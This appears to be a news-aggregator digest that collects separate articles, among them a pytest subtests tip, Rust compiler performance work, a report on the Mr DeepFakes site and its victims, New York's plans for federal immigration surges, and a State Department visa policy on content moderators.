2025-12-05 06:03:29
TIL: Subtests in pytest 9.0.0+ I spotted an interesting new feature in the release notes for pytest 9.0.0: subtests. I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful...
Original Article

TIL: Subtests in pytest 9.0.0+ . I spotted an interesting new feature in the release notes for pytest 9.0.0 : subtests .

I'm a big user of the pytest.mark.parametrize decorator - see Documentation unit tests from 2018 - so I thought it would be interesting to try out subtests and see if they're a useful alternative.

Short version: this parameterized test:

@pytest.mark.parametrize("setting", app.SETTINGS)
def test_settings_are_documented(settings_headings, setting):
    assert setting.name in settings_headings

Becomes this using subtests instead:

def test_settings_are_documented(settings_headings, subtests):
    for setting in app.SETTINGS:
        with subtests.test(setting=setting.name):
            assert setting.name in settings_headings

Why is this better? Two reasons:

  1. It appears to run a bit faster
  2. Subtests can be created programatically after running some setup code first

I had Claude Code port several tests to the new pattern. I like it.

When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation

Portside
portside.org
2025-12-05 05:37:41
When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation jay Fri, 12/05/2025 - 00:37 ...
Original Article

Jackie Bray has been thinking about how quickly things could spiral out of control.

Bray is the New York state emergency leader whom Gov. Kathy Hochul tasked with averting a Chicago or Los Angeles-style surge of immigration agents and National Guard troops. At the core of the job is a dilemma that the Trump administration has imposed on blue cities and states around the country: How can the state respond to aggressive, spectacle-driven immigration operations without triggering the showdown with federal agents that the administration is trying to provoke?

It’s a problem only made more acute by how geared some of the operations have been towards gaining as much attention as possible, and by their direction away from immigration enforcement, and towards repressing protests in response.

The result, state officials say, is a split approach. New York will fight to delay and block any federal deployment of the National Guard. But when it comes to surges of immigration enforcement officers, the plan is restraint: state and local police will act as buffers between federal agents and protestors, doing what they can to control crowds and de-escalate.

Glimpses of that strategy have already started to emerge. NYPD Commissioner Jessica Tisch reportedly got a heads-up about a high-profile October immigration raid on Manhattan’s Canal Street from the Trump administration; the Daily News reported that she directed officers to steer clear of the area. At a protest in late November, local police placed barricades between demonstrators and a group of Immigration and Customs Enforcement and Border Patrol officers who the activists had surrounded in a parking garage.

The approach has already led to criticism that the state is accommodating, and not fighting, what many regard as an increasingly harrowing example of authoritarianism. State officials respond that their approach is necessary to stop events from spiraling into the kind of escalation that could justify more federal deployments.

“I feel very lucky to not be an elected leader right now,” Bray told TPM.

Outreach

Gov. Kathy Hochul (D) directed Bray, a political appointee serving as director of New York State Division of Homeland Security and Emergency Services, over the summer to work out a plan that would avert the kind of splashy, violent federal presence that overtook Chicago, Los Angeles, and other cities.

For prevention, one model stands out: San Francisco.

There, Silicon Valley executives, along with Mayor Daniel Lurie (D), pleaded with Trump. They argued that a deployment would damage the economy. He replied by calling it off: “Friends of mine who live in the area called last night to ask me not to go forward with the surge,” he wrote on Truth Social.

That’s the plan that New York officials are trying to implement. They’ve convened groups of Wall Street leaders (Bray declined to say whether any had spoken to White House officials); both Hochul and New York City mayor-elect Zohran Mamdani have spoken with Trump directly.

Those meetings have resulted in something less than an adversarial relationship. As Trump shepherded Mamdani through an Oval Office press conference last month, the mayor-elect emphasized areas where the city and federal government could work together.

There are other benefits that the state can provide Trump, whose family business is still deeply rooted in New York. This week, a state gambling board approved licenses for three proposed casinos: one of them is set to be built on a golf course that belonged to the President. The move will net the Trump Organization $115 million.

Chicago and LA warnings

The deployments in Chicago and Los Angeles brought a level of brutality that, at first, helped to obscure their real aim.

The Trump administration cast them as immigration enforcement efforts, albeit with a new level of aggression. But after the White House used local, minor incidents of violence to justify sending troops in, the ICE and CBP operations started to strike observers as pretexts to stage larger-scale repression.

That prompted organizing between cities and states that had experienced the deployments and those that were next. New York’s Communications Workers of America organized one call in September titled “Learning From Chicago and LA and Preparing for Federal Escalation,” between elected officials in New York, Illinois, California, and elsewhere.

“We were just cautioning people to not lose the messaging war,” Hugo Martinez, a Los Angeles city councilmember on the call, told TPM. He said that the administration was seeking grounds to escalate, and that community leaders needed to “try to have as much control as possible over the response that the community has.”

Byron Sigcho-Lopez, a Chicago alderman, was on the call as well.

He took the message to heart. His community, Chicago’s Little Village, became an epicenter of CBP operations. One video that Byron-Lopez recorded of an October encounter with Bovino demonstrates how he internalized the approach: at several points, when demonstrators started to approach federal agents, Byron-Lopez would wave them off.

“They wanted to see escalation,” he told TPM last month.

Bray, the New York state commissioner, said that she had spoken to her counterparts in California and Illinois. For her, a few points became clear: litigation needed to start early. Local law enforcement needed to be prepared for the administration to direct federal authorities to stop communicating with them. Certain sites — like ICE detention facilities — became flashpoints.

Averted, but for how long?

The charm offensive has worked for now, state and city officials told TPM. But nobody can say how long that will last.

City officials are already taking some steps to prepare. The city sold a still-functional but out-of-use prison barge that was anchored near Rikers Island to a scrap company in Louisiana, removing 800 beds that the federal government could have seized for immigration enforcement. The city’s Economic Development Corporation, which is responsible for the project, declined to comment.

New York Attorney General Tish James’ office is preparing legal strategies and lawsuits to file that would challenge any National Guard deployment, one official told TPM.

Community organizers — some of whom have held calls with their counterparts in Chicago, LA, and elsewhere — are preparing as well.

They envision a campaign of resistance that will start with measures already in place, like flyers calling for people to report ICE and CBP operations. That information is then relayed to a network of people who can mobilize in response, organizing through messaging apps and staging spontaneous protests like one that appeared in Manhattan over the weekend and corralled federal agents for roughly two hours.

On the less risky end, that can mean mutual aid programs to provide legal and other forms of support. But some organizers also want to see more disruption. Jasmine Gripper, a state director of the Working Families Party, was on the call with local officials from LA and Chicago. Gripper told TPM that she envisioned a series of tactics that she described as “not letting ICE be at peace in our city.” That means persuading restaurant owners to refuse to serve immigration agents, following agents around with large bullhorns announcing their presence, and finding out where they’re staying and making loud noises at night.

“How do we disrupt at every level and have peaceful resistance and noncompliance to ICE being in our communities and what best can keep our folks safe?” she said.

Bray, the New York State emergency and homeland security commissioner, told TPM that she’s devoting around half of her schedule to trying to avert a federal escalation and to planning for one if it does happen.

The aggression in federal operations in Chicago shocked her, she said. Federal agents walked around in fatigues, unidentified while wearing masks, as if they were an occupying foreign power. In one incident in Chicago, law enforcement rappelled from a helicopter into a dilapidated apartment building for a showy immigration raid.

“Why? Tell me what the strategic, tactical, operational, requirement for that is?” Bray asked.

It’s illegal to block federal agents from doing their job, Bray said. The overriding risk is that things spiral out of control. In California, federal law enforcement cut off communication with local cops as operations there ramped up. Bray told TPM that the state will do what it can to make sure that those lines of communication stay open, even when that means having police prevent demonstrators from blocking federal agents.

“You get images where people will say to me, ‘well, wait a second, look, isn’t that the NYPD helping?’ No, they’re not helping,” Bray said. “They’re doing crowd control. They’re making sure that there aren’t violent clashes in front of a government building. That’s their job. That’s not cooperation with feds. But, you know, this is gonna test us all.”

Josh Kovensky is an investigative reporter for Talking Points Memo, based in New York. He previously worked for the Kyiv Post in Ukraine, covering politics, business, and corruption there. ]

How to speed up the Rust compiler in December 2025

Lobsters
nnethercote.github.io
2025-12-05 05:12:20
Comments...
Original Article

It has been more than six months since my last post on the Rust compiler’s performance. In that time I lost one job and gained another . I have less time to work directly on the Rust compiler than I used to, but I am still doing some stuff, while also working on other interesting things .

Compiler improvements

#142095 : The compiler has a data structure called VecCache which is a key-value store used with keys that are densely-numbered IDs, such as CrateNum or LocalDefId . It’s a segmented vector with increasingly large buckets added as it grows. In this PR Josh Triplett optimized the common case when the key is in the first segment, which holds 4096 entries. This gave icount reductions across many benchmark runs, beyond 4% in the best cases.

#148040 : In this PR Ben Kimock added a fast path for lowering trivial consts. This reduced compile times for the libc crate by 5-15%! It’s unusual to see a change that affects a single real-world crate so much, across all compilation scenarios: debug and release, incremental and non-incremental. This is a great result. At the time of writing, libc is the #12 mostly popular crate on crates.io as measured by “recent downloads”, and #7 as measured by “all-time downloads”. This change also reduced icounts for a few other benchmarks by up to 10%.

#147293 : In the query system there was a value computed on a hot path that was only used within a debug! call. In this PR I avoided doing that computation unless necessary, which gave icount reductions across many benchmark results, more than 3% in the best case. This was such a classic micro-optimization that I added it as an example to the Logging and Debugging chapter of the The Rust Performance Book .

#148706 : In this PR dianne optimized the handling of temporary scopes. This reduced icounts on a number of benchmarks, 3% in the best case. It also reduced peak memory usage on some of the secondary benchmarks containing very large literals, by 5% in the best cases.

#143684 : In this PR Nikita Popov upgraded the LLVM version used by the compiler to LLVM 21. In recent years every LLVM update has improved the speed of the Rust compiler. In this case the mean icount reduction across all benchmark results was an excellent 1.70% , and the mean cycle count reduction was 0.90% , but the mean wall-time saw an increase of 0.26% . Wall-time is the true metric, because it’s what users perceive, though it has high variance. icounts and cycles usually correlate well to wall-time, especially on large changes like this that affect many benchmarks, though this case is a counter-example. I’m not quite sure what to make of it; I don’t know whether the wall-time results on the test machine are representative.

#148789 : In this PR Mara Bos reimplemented format_args!() and fmt::Arguments to be more space-efficient. This gave lots of small icount wins, and a couple of enormous (30-38%) wins for the large-workspace stress test. Mara wrote about this on Mastodon . She also has written about prior work on formatting on her blog and in this tracking issue . Lots of great reading there for people who love nitty-gritty optimization details, including nice diagrams of how data structures are laid out in memory.

Proc macro wins in Bevy

In June I added a new compiler flag -Zmacro-stats that measures how much code is generated by macros. I wrote previously about how I used it to optimize #[derive(Arbitrary)] from the arbitrary crate used for fuzzing.

I also used it to streamline the code generated by #[derive(Reflect)] in Bevy . This derive is used to implement reflection on many types and it produced a lot of code. For example, the bevy_ui crate was around 16,000 lines and 563,000 bytes of source code. The code generated by #[derive(Reflect)] for types within that crate was around 27,000 lines and 1,544,000 bytes. Macro expansion almost quadrupled the size of the code, mostly because of this one macro!

The code generated by #[derive(Reflect)] had a lot of redundancies. I made PRs to remove unnecessary calls , duplicate type bounds (and a follow-up ), const _ blocks , closures , arguments , trait bounds , attributes , impls , and finally I factored out some repetition .

After doing this I measured the bevy_window crate. The size of the code generated by #[derive(Reflect)] was reduced by 39%, which reduced cargo check wall-time for that crate by 16%, and peak memory usage by 5%. And there are likely similar improvements across many other crates within Bevy, as well as programs that use #[derive(Reflect)] themselves.

It’s understandable that the generated code was suboptimal. Proc macros aren’t easy to write; there was previously no easy way to measure the size of the generated code; and the generated code was considered good enough because (a) it worked, and (b) the compiler would effectively optimize away all the redundancies. But in general it is more efficient to optimize away redundancies at the generation point, where context-specific and domain-specific information is available, rather than relying on sophisticated optimization machinery further down the compilation pipeline that has to reconstruct information. And it’s just less code to parse and represent in memory.

rustdoc-json

At RustWeek 2025 I had a conversation with Predrag Gruevski about rustdoc-json (invoked with the --output-format=json flag) and its effects on the performance of cargo-semver-checks . I spent some time looking into it and found one nice win.

#142335 : In this PR I reduced the number of allocations done by rustdoc-json. This gave wall-time reductions of up to 10% and peak memory usage reductions of up to 8%.

I also tried various other things to improve rustdoc-json’s speed, without much success. JSON is simple and easy to parse, and rustdoc-json’s schema for representing Rust code is easy for humans to read. These features are great for newcomers and people who want to experiment. It also means the JSON output is space-inefficient, which limits the performance of heavy-duty tools like cargo-semver-checks that are designed for large codebases. There are some obvious space optimizations that could be applied to the JSON schema, like shortening field names, omitting fields with default values, and interning repeated strings. But these all affect its readability and flexibility.

The right solution here is probably to introduce a performance-oriented second format for the heavy-duty users. #142642 is a draft attempt at this. Hopefully progress can be made here in the future.

Faster compilation of large API crates

Josh Triplett introduced a new experimental flag, -Zhint-mostly-unused , which can give big compile time wins for people using small fractions of very large crates. This is typically the case for certain large API crates, such as windows , rustix , and aws-sdk-ec2 . Read about it here .

Faster Rust builds on Mac

Did you know that macOS has a secret setting that can make Rust builds faster? No joke!

General progress

Progress since May must be split into two parts, because in July we changed the machine on which the measurements are done.

The first period (2025-05-20 to 2025-06-30) was on the old machine. The second period (2025-07-01 to 2025-12-03) was on the new machine.

The mean wall-time changes were moderate improvements (-3.19% and -2.65%). The mean peak memory usage changes were a wash (+1.18% and -1.50%). The mean binary size changes were small increases (0.45% and 2.56%).

It’s good that wall-times went down overall, even if the other metrics were mixed. There is a slow but steady stream of bug fixes and new features to the compiler, which often hurt performance. In the absence of active performance work the natural tendency for a compiler is to get slower, so I view even small improvements as a win.

The new machine reduced wall-times by about 20%. It’s worth upgrading your hardware, if you can!

‘It was about degrading someone completely’: the story of Mr DeepFakes – the world’s most notorious AI porn site

Guardian
www.theguardian.com
2025-12-05 05:00:42
The hobbyists who helped build this site created technology that has been used to humiliate countless women. Why didn’t governments step in and stop them? For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a li...
Original Article

For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a link, which took her to a site called Mr DeepFakes. There, she found fake images of herself, naked, squatting, chained, performing sex acts with various animals. They were tagged “Patrizia Schlosser sluty FUNK whore” (sic).

“They were very graphic, very humiliating,” says Schlosser, a German journalist for Norddeutscher Rundfunk (NDR) and Funk . “They were also very badly done, which made it easier to distance myself, and tell myself they were obviously fake. But it was very disturbing to imagine somebody somewhere spending hours on the internet searching for pictures of me, putting all this together.”

The site was new to Schlosser, despite her previous high-profile investigations into the porn industry. “I’d never heard of Mr DeepFakes – a porn site entirely dedicated to fake porn videos and photos. I was surprised by how big it was – so many videos of every celebrity you know.” Schlosser’s first reaction on seeing herself among them was to brush it aside. “I tried to push it to the back of my mind, which was really a strategy of not dealing with it,” she says. “But it’s strange how the brain works. You know it’s fake but still you see it. It’s not you but also it is you. There you are with a dog and a chain. You feel violated but confused. At some point, I decided: ‘No. I’m angry. I don’t want those images out there.’”

Schlosser’s subsequent documentary for NDR’s STRG_F programme did succeed in getting the images removed. She also tracked down the young man who had created and posted them – even visiting his home and speaking to his mother. (The perpetrator himself wouldn’t come out of his bedroom.) However, Schlosser was unable to identify “Mr DeepFakes” – or whoever was behind the site, despite enlisting the help of Bellingcat, the online investigative journalism collective. Bellingcat’s Ross Higgins was on the team. “My background is investigating money laundering,” he says. “I looked at the structure of the website and it was using the same internet service providers (ISPs) as proper serious organised criminals.” The ISPs suggested links to the Russian mercenary group Wagner, and individuals named in the Panama Papers . The ads it carried included ones for apps owned by Chinese technology companies, which allowed China’s government access to all customer data. “I made the presumption that this was all much too sophisticated to be a site of hobbyists,” says Higgins.

It turned out that’s exactly what it was.

The story of Mr DeepFakes, the world’s largest, most notorious nonconsensual deepfake porn site, is really the story of AI porn itself – the very term “deepfake” is believed to have come from its originator. A “ground zero” for AI-generated pornography, its pages – which have been viewed more than 2bn times – have depicted countless female celebrities, politicians, European princesses, wives and daughters of US presidents, being kidnapped, tortured, shaved, bound, mutilated, raped and strangled. Yet all this content (which would take more than 200 days to watch) was just the site’s “shop window”. Its true heart, it’s “engine room”, was its forum. Here, anyone wanting deepfakes created of someone they knew (a girlfriend, sister, classmate or colleague) could find someone willing to make them to order for the right price. It was also a “training ground”, a technical hub where “hobbyists” taught one another, shared tips, posted academic papers and “problem-solved”. (One recurring problem was how to deepfake without a good “dataset”. This means when you’re trying to deepfake someone you don’t have many pictures of – so not a celebrity, but maybe someone you know whose social media you’ve screengrabbed.)

The film-maker and activist Sophie Compton spent many hours monitoring Mr DeepFakes while researching the award-winning 2023 documentary Another Body (available on iPlayer). “Looking back, I think that site played such an instrumental role in the proliferation of deepfakes overall,” she says. “I really think that there’s a world in which the site didn’t get made, wasn’t allowed to be made or was shut down quickly, and deepfake porn is just a fraction of the issue that we have today. Without that site, I don’t think it would have exploded in the way it did.”

In fact, that scenario was entirely possible. The origins of Mr Deepfakes stretch back to 2017-18 when AI porn was just beginning to build on social media sites such as Reddit. One anonymous Redditor and AI porn “pioneer” who went by the name of “deepfakes” (and is thus credited with coining the term) gave an early interview to Vice about its potential. Shortly after, though, in early 2018, Reddit banned deepfake porn from its site. “We have screenshots from their message boards at that time and the deepfake community, which was small, was freaking out and jumping ship,” says Compton. This is when Mr DeepFakes was created, with the early domain name dpfks.com. The administrator carried the same username – dpfks – and was the person who advertised for volunteers to work as moderators, and posted rules and guidelines, as well as deepfake videos and an in-depth guide to using software for deepfake porn.

“What’s so depressing about reading the messages and seeing the genesis is realising how easily governments could have stopped this in its tracks,” says Compton. “The people doing it didn’t believe they were going to be allowed free rein. They were saying: ‘They’re coming for us!’, ‘They’re never going to let us do this!’ But as they continued without any problems at all, you see this growing emboldenment. Covid added to the explosion as everyone stopped moderating content. The output was violent – it was about degrading someone completely. The celebrities that were really popular were often really young – Emma Watson, Billie Eilish, Millie Bobby Brown.” (Greta Thunberg is another example here.)

Who was behind it? From time to time, Mr DeepFakes gave anonymous interviews. In a 2022 BBC documentary, Deepfake Porn: Could You Be Next?, the site’s “owner” and “web developer”, going by the pseudonym “deepfakes”, made the argument that consent from the women wasn’t required as “it’s a fantasy, it’s not real”.

Was money their motivation? Mr DeepFakes ran ads and had a premium membership paid in cryptocurrency – in 2020, one forum mentions that it made between $4,000 and $7,000 a month. “There was a commercial aspect,” says Higgins. “It was a side hustle, but it was more than that. It gave this notoriety.”

At one point, the site “posted 6,000 pictures of AOC’s [the US politician Alexandria Ocasio-Cortez’s] face in order that people could make deepfake pornography of her,” says Higgins. “It’s insane. [There were] all these files of YouTubers and politicians. What it’s saying is that if you’re a woman in this world you can only achieve so much because if you put your head above the parapet, if you have the temerity to do anything publicly, you can expect your image to be used in the most degrading way possible for personal profit.

“The most affecting thing for me was the language used about women on that site,” he continues. “We had to change it for our online report because we didn’t want it to be triggering, but this is pure misogyny. Pure hatred.”

This April, investigators began to believe that they had found Mr DeepFakes and sent emails to their suspect.

On 4 May, Mr DeepFakes shut down. A notice on its homepage blamed “data loss” caused by the withdrawal of a “critical service provider”. “We will not be relaunching,” it continued. “Any website claiming this is fake. This domain will eventually expire and we are not responsible for future use. This message will be removed in about a week.”

Mr DeepFakes is finished – but according to Compton, this could have happened so much sooner. “All the signs were there,” she says. The previous year, in April 2024, when the UK government announced plans to criminalise the creation and sharing of deepfake sexual abuse material , Mr DeepFakes responded by immediately blocking access to UK users. (The plans were later shelved when the 2024 election was called.) “It showed that ‘Mr DeepFakes’ was obviously not so committed that there was nothing governments could do,” says Compton. “If it was going to become too much of a pain and a risk to run the site, then they weren’t going to bother.”

But deepfake porn has become so popular, so mainstream, that it no longer requires a “base camp”. “The things that those guys prided themselves on learning how to do and teaching others are now so embedded, they’re accessible to anyone on apps at the click of the button,” says Compton.

And for those wanting something more complex, the creators, the self-styled experts who once lurked on its forum, are now out there touting for business. Patrizia Schlosser knows this for sure. “As part of my research, I went undercover and reached out to some of the people on the forums, asking for a deepfake of an ex-girlfriend,” says Schlosser. “Although it’s often claimed the site was only about celebrities, that wasn’t true. The response was, ‘Yeah, sure …’

“After Mr DeepFakes shut down, I got an automatic email from one of them which said: “If you want anything made, let me know … Mr DeepFakes is down – but of course, we keep working.”

In the UK and Ireland, Samaritans can be contacted on freephone 116 123, or email jo@samaritans.org or jo@samaritans.ie. In the US, you can call or text the 988 Suicide & Crisis Lifeline at 988 or chat at 988lifeline.org . In Australia, the crisis support service Lifeline is 13 11 14. Other international helplines can be found at befrienders.org

In the UK, Rape Crisis offers support for rape and sexual abuse on 0808 802 9999 in England and Wales, 0808 801 0302 in Scotland , or 0800 0246 991 in Northern Ireland . In the US, Rainn offers support on 800-656-4673. In Australia, support is available at 1800Respect (1800 737 732). Other international helplines can be found at ibiblio.org/rcip/internl.html

Trump Knows He’s Failing. Cue the Bigotry.

Portside
portside.org
2025-12-05 04:39:41
Trump Knows He’s Failing. Cue the Bigotry. jay Thu, 12/04/2025 - 23:39 ...
Original Article

Photo credit: Farah Abdi Warsameh/Associated Press // New York Times

On Tuesday, President Trump called my friends and me “garbage.”

This comment was only the latest in a series of remarks and Truth Social posts in which the president has demonized and spread conspiracy theories about the Somali community and about me personally. For years, the president has spewed hate speech in an effort to gin up contempt against me. He reaches for the same playbook of racism, xenophobia, Islamophobia and division again and again. At one 2019 rally, he egged on his crowd until it chanted “send her back” when he said my name .

Mr. Trump denigrates not only Somalis but so many other immigrants, too, particularly those who are Black and Muslim. While he has consistently tried to vilify newcomers, we will not let him silence us. He fails to realize how deeply Somali Americans love this country. We are doctors, teachers, police officers and elected leaders working to make our country better. Over 90 percent of Somalis living in my home state, Minnesota, are American citizens by birth or naturalization. Some even supported Mr. Trump at the ballot box.

“I don’t want them in our country,” the president said this week. “Let them go back to where they came from.”

Somali Americans remain resilient against the onslaught of attacks from the White House. But I am deeply worried about the ramifications of these tirades. When Mr. Trump maligns me, it increases the number of death threats that my family, staff members and I receive. As a member of Congress, I am privileged to have access to security when these threats arise. What keeps me up at night is that people who share the identities I hold — Black, Somali, hijabi, immigrant — will suffer the consequences of his words, which so often go unchecked by members of the Republican Party and other elected officials. All Americans have a duty to call out this hateful rhetoric when we hear it.

The president’s dehumanizing and dangerous attacks on minority immigrant communities are nothing new. When he first ran for president a decade ago, he launched his campaign with claims that he was going to pause Muslim immigration to this country. He has since falsely accused Haitian migrants of eating pets and referred to Haiti and African nations as “shithole” countries. He has accused Mexico of sending rapists and drug peddlers across our border. It is unconscionable that he fails to acknowledge how this country was built on the backs of immigrants and mocks their ongoing contributions.

While the president wastes his time attacking my community, my state, my governor and me, the promises of economic prosperity he made in his run for president last year have not come to fruition. Prices have not come down; in many cases, they have risen. His implementation of tariffs has hurt farmers and small business owners. His policies have only worsened the affordability crisis for Americans. And now, with Affordable Care Act tax credits set to expire, health care costs for American households are primed to skyrocket, and millions of people risk losing their coverage under his signature domestic policy bill.

The president knows he is failing, and so he is reverting to what he knows best: trying to divert attention by stoking bigotry.

When I was sworn into Congress in 2019, my father turned to me and expressed bewilderment that the leader of the free world was picking on a freshman member of Congress, one out of 535 members of the legislative body. The president’s goal may have been to try to tear me down, but my community and my constituents rallied behind me then, just as they are now.

I often say that although Minnesota may be cold, the people here have warm hearts. Minnesota is special. That is why when so many Somalis arrived in this country, they chose the state as home. I am deeply grateful to the people of Minnesota for the generosity, hospitality and support they have shown to every immigrant community in our state.

We will not let Mr. Trump intimidate or debilitate us. We are not afraid. After all, Minnesotans not only welcome refugees, they also sent one to Congress.

Thoughts on Go vs. Rust vs. Zig

Simon Willison
simonwillison.net
2025-12-05 04:28:05
Thoughts on Go vs. Rust vs. Zig Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this. One thing that I hadn't noticed before is that none of these three languages implement class-based OOP...
Original Article

Thoughts on Go vs. Rust vs. Zig ( via ) Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.

One thing that I hadn't noticed before is that none of these three languages implement class-based OOP.

Posted 5th December 2025 at 4:28 am

Cloudflare is down

Hacker News
www.cloudflare.com
2025-12-05 08:50:16
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.

Speak to sales about SASE to modernize your network and secure your workspace.

No options

Select your job level... *

No options

Select your job function... *

No options

Bolivia, Plurinational State of

Bonaire, Sint Eustatius and Saba

British Indian Ocean Territory

Congo, the Democratic Republic of the

Falkland Islands (Malvinas)

French Southern Territories

Heard Island and McDonald Islands

Holy See (Vatican City State)

Lao People's Democratic Republic

Macedonia, the former Yugoslav Republic of

Saint Helena, Ascension and Tristan da Cunha

Saint Martin (French part)

Saint Pierre and Miquelon

Saint Vincent and the Grenadines

Sint Maarten (Dutch part)

South Georgia and the South Sandwich Islands

Tanzania, United Republic of

Venezuela, Bolivarian Republic of

Learn more

Related

Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.

Related

Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.

Related

One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

60+

cloud services available globally

234B

cyber threats blocked each day

20%

of all websites are protected by Cloudflare

330+

cities in 125+ countries, including mainland China

Cloudflare Stats

Leading companies rely on Cloudflare

Connect

Protect

Build

How Cloudflare can help

Performance acceleration bolt

Accelerate website performance

Security shield protection

Block bot traffic

Block bot traffic

Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.

Optimize Video Experience

Optimize video experiences

Deploy Severless Code Icon

Deploy serverless code

Deploy serverless code

Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.

Deploy AI on the Edge Icon

Deploy AI on the edge

Eliminate Egress Fee for Object Storage

Eliminate egress fee for object storage

News and resources

What's new

Insights

Library

Events

Get started with the connectivity cloud

Security Shield Protection Icon

Get started for free

Get easy, instant access to Cloudflare security and performance services.

Start for free
Constellation Icon

Need help choosing?

Get a personalized product recommendation for your specific needs.

Find the right plan
Innovation Thinking Icon

Talk to an expert

Have questions or want to get a demo? Get in touch with one of our experts.

Contact us

UniFi 5G

Hacker News
blog.ui.com
2025-12-05 07:06:38
Comments...
Original Article

Back

4 December 2025

Tom Hildebrand

The UniFi 5G Max lineup was created with a clear goal in mind: deliver a sleek, versatile, and exceptionally powerful 5G internet experience that works effortlessly in any environment.

UniFi 5G Max: Simple Setup and Clean Design

The UniFi 5G Max makes deployment easy, whether installed locally or at a remote site. Plug it into any PoE port and it instantly appears as a ready to use WAN interface, no matter whether plugged directly into your UniFi gateway or into your office switch. No new cable runs needed! It sits neatly on a desk, but you can reposition it for the best possible signal using the included wall or window mount.

  • Automatic adoption as a UniFi WAN interface on any PoE port.
  • Compact indoor design with a handy LCM
  • Desk, wall, or window mounting options
  • Optimize signal reception by repositioning anywhere on the network.
  • Ideal for home, office, or remote site use.

A compact form factor designed for fast installation and flexible placement at the core or edge.

Ultra-Flexible Connectivity for Any Network Role

The 5G Max delivers downlink speeds up to 2 Gbps with ultra low latency that makes it reliable as a primary connection and seamless as a backup WAN. UniFi routing policies and SLAs let you choose exactly how and when 5G is used, and for which clients and VLANs. Easily set per-SIM usage limits to avoid overage costs with just a few clicks.

  • Up to 2 Gbps downlink
  • Ultra low latency on supported networks
  • Works as primary, load-balanced, or failover WAN
  • Customizable policy based routing
  • SLA driven control through UniFi

High speed 5G that adapts to your network's rules, not the other way around.

UniFi 5G Max Outdoor: Rugged Speed and Extended Reach

For tougher environments or deployments with poor indoor cellular coverage, the outdoor model maintains the same high performance cellular connectivity with improved antenna performance in a durable IP67 rated enclosure. It is built for rooftop installs, off site locations, and mobile deployments where reliability is critical. Just like its indoor counterpart, you can also connect it via any PoE port, anywhere on your network, greatly simplifying cabling requirements.

  • Enhanced long range antenna design
  • IP67 weather resistant construction
  • Built for rooftops, remote sites, and vehicle based setups
  • Stable performance in harsh conditions

A weatherproof 5G device built for reliability wherever you place it.

Dream Router 5G Max: The Fully Integrated UniFi Experience

If you want everything UniFi in one device, the DreamRouter 5G Max combines 5G connectivity with WiFi 7, local storage, and full UniFi OS application support. Deploy it anywhere 5G is available and run an entire high-performance and scalable network stack instantly.

  • Integrated tri-band WiFi 7
  • Local storage via MicroSD for UniFi apps
  • Full UniFi OS environment
  • Complete routing and management in one device
  • Perfect for remote offices and flexible deployments

A complete UniFi system powered by the reach and speed of 5G.

Fully Unlocked for Maximum Carrier Flexibility

Every device in the UniFi 5G lineup supports both physical SIMs and eSIM, giving you the freedom to choose your carrier and switch whenever needed with zero friction. All are equipped with dual SIM slots, with one SIM replaceable by eSIM, and are fully unlocked: any major carrier, any type of deployment, with one piece of hardware.

  • Unlocked hardware for all major carriers
  • Supports physical SIM and eSIM
  • Fast activation and easy carrier changes
  • Consistent performance across service providers

Carrier freedom built directly into the hardware from day 1.

The UniFi 5G lineup brings sleek design, powerful performance, easy installation, and genuine WAN flexibility to every deployment.

Latest Articles

State Department to deny visas to fact checkers and others, citing 'censorship'

Hacker News
www.npr.org
2025-12-05 04:59:08
Comments...
Original Article
The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo. s pictured on October 08, 2024 in Washington, DC. The Harry S Truman Federal Building was built in 1941 and has housed the office of the Secretary of State since 1947. (Photo by Kevin Dietsch/Getty Images)

The Harry S. Truman Federal Building, headquarters of the U.S. Department of State, in a 2024 file photo. Kevin Dietsch/Getty Images hide caption

toggle caption

Kevin Dietsch/Getty Images

The State Department is instructing its staff to reject visa applications from people who worked on fact-checking, content moderation or other activities the Trump administration considers "censorship" of Americans' speech.

The directive, sent in an internal memo on Tuesday, is focused on applicants for H-1B visas for highly skilled workers, which are frequently used by tech companies, among other sectors. The memo was first reported by Reuters ; NPR also obtained a copy.

"If you uncover evidence an applicant was responsible for, or complicit in, censorship or attempted censorship of protected expression in the United States, you should pursue a finding that the applicant is ineligible" for a visa, the memo says. It refers to a policy announced by Secretary of State Marco Rubio in May restricting visas from being issued to "foreign officials and persons who are complicit in censoring Americans."

The Trump administration has been highly critical of tech companies' efforts to police what people are allowed to post on their platforms and of the broader field of trust and safety, the tech industry's term for teams that focus on preventing abuse, fraud, illegal content, and other harmful behavior online.

President Trump was banned from multiple social media platforms in the aftermath of his supporters' attack on the Capitol on Jan. 6, 2021. While those bans have since been lifted, the president and members of his administration frequently cite that experience as evidence for their claims that tech companies unfairly target conservatives — even as many tech leaders have eased their policies in the face of that backlash .

Tuesday's memo calls out H-1B visa applicants in particular "as many work in or have worked in the tech sector, including in social media or financial services companies involved in the suppression of protected expression."

It directs consular officers to "thoroughly explore" the work histories of applicants, both new and returning, by reviewing their resumes, LinkedIn profiles, and appearances in media articles for activities including combatting misinformation, disinformation or false narratives, fact-checking, content moderation, compliance, and trust and safety.

